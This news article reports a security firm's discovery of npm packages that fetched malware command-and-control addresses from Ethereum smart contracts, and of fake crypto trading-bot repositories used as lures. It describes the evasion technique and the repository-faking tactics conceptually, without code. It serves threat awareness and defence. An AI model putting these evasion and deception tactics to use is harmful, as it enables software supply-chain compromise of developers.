New Hacker Technique Targets Ethereum Contracts

Hackers Exploit Ethereum Smart Contracts

Hackers have discovered a novel method of concealing malware inside Ethereum smart contracts, allowing them to bypass traditional security scans and deploy hidden threats through open-source repositories.

Researchers at cybersecurity and digital asset compliance firm ReversingLabs recently uncovered two malicious Node Package Manager (NPM) packages—“colortoolsv2” and “mimelib2.” These packages did not directly host malware but instead leveraged Ethereum smart contracts to fetch command-and-control server addresses that delivered second-stage malware.

This new approach complicates detection efforts, as blockchain traffic typically appears legitimate. Instead of triggering alarms by connecting to suspicious URLs, the malware leveraged Ethereum’s decentralized nature as a trusted medium for communication, making malicious activity significantly harder to track.

ReversingLabs researcher Lucija Valentić explained that while malware has previously targeted Ethereum smart contracts, this particular method—using them to host URLs for malicious commands—marks a significant evolution in hacker evasion tactics.

 

Malware Hidden Inside NPM Packages

The two compromised NPM packages published in July initially appeared to be harmless utilities. However, they contained downloader functions that interacted with Ethereum smart contracts.

Instead of embedding malicious links directly, the packages queried Ethereum contracts for URLs. These URLs then delivered the second-stage malware payload, enabling the attackers to maintain persistence and execute harmful actions on infected systems.

This technique effectively sidesteps static security analysis since the malicious URLs are not stored in the packages themselves. Security tools scanning package repositories cannot flag anything suspicious until the package interacts with the blockchain to retrieve commands.

Such methods highlight a growing trend in the open-source ecosystem, where malicious actors exploit trust in public repositories like NPM and GitHub to deliver sophisticated attacks.

 

A Larger Deception Campaign Uncovered

According to ReversingLabs, the malicious packages were part of an elaborate social engineering campaign. Threat actors constructed fake cryptocurrency trading bot repositories to lure developers and crypto enthusiasts.

These repositories appeared highly legitimate due to:

• Fabricated commits simulating long-term activity.
  
• Multiple fake maintainer accounts giving an impression of active collaboration.
  
• Fake GitHub accounts that “starred” and followed the repositories for credibility.
  
• Professional project descriptions and documentation designed to build trust.
  

Such deception strategies were effective in drawing unsuspecting developers, who unknowingly integrated the compromised packages into their projects. This demonstrates how cybercriminals increasingly blend technical innovation with social engineering to execute malware campaigns.

This approach has striking similarities to prior attacks. For example, the Lazarus Group, a North Korea-linked hacking collective, was previously linked to malware concealed in Ethereum contracts earlier in 2024. However, the new method of hiding malicious URLs within contracts represents an escalation in complexity and stealth.

 

Evolution Of Open-Source Attacks

The rise of attacks targeting open-source repositories is not isolated. Security researchers documented 23 crypto-related malicious campaigns in 2024 alone, proving the growing attractiveness of open-source ecosystems for cybercriminals.

Notably:

• In April, a fake Solana trading bot repository on GitHub distributed malware that stole crypto wallet credentials.
  
• Another campaign targeted Bitcoinlib, an open-source Python library, inserting obscured malware to compromise developer systems.
  

These incidents reflect a wider trend of repository-based attacks, blending blockchain tools, cryptocurrency themes, and sophisticated social engineering to evade detection.

By using Ethereum smart contracts as intermediaries, hackers gain several advantages:

1. Anonymity and persistence — blockchain content cannot easily be deleted or censored.
   
2. Legitimacy masking — blockchain queries look like standard developer or trading activities.
   
3. Dynamic malware delivery — malicious payloads can be updated without changing the NPM package itself.
   

Such tactics underscore the urgent need for stronger vetting mechanisms in open-source repositories, as well as heightened awareness among developers integrating third-party packages.

 

Defending Against Emerging Threats

This latest discovery reinforces that malware targeting Ethereum smart contractsis no longer hypothetical—it is an evolving reality. The blending of blockchain technology with traditional malware delivery tactics creates a hybrid threat landscape that security researchers and developers must urgently address.

To mitigate these risks, cybersecurity experts recommend:

• Verifying package sources before installation.
  
• Auditing code repositories for suspicious dependencies.
  
• Monitoring blockchain interactions in applications for anomalies.
  
• Collaborating across the developer community to flag and remove compromised packages quickly.
  

The ReversingLabs discovery is a reminder that as blockchain adoption grows, malicious actors will continue innovating, finding new ways to exploit trust, decentralization, and the open-source ethos for their gain.

As Valentić concluded, the technique highlights the fast evolution of detection evasion strategies, and shows that “attacks on repositories are evolving” with more sophisticated blends of blockchain exploitation and social engineering campaigns.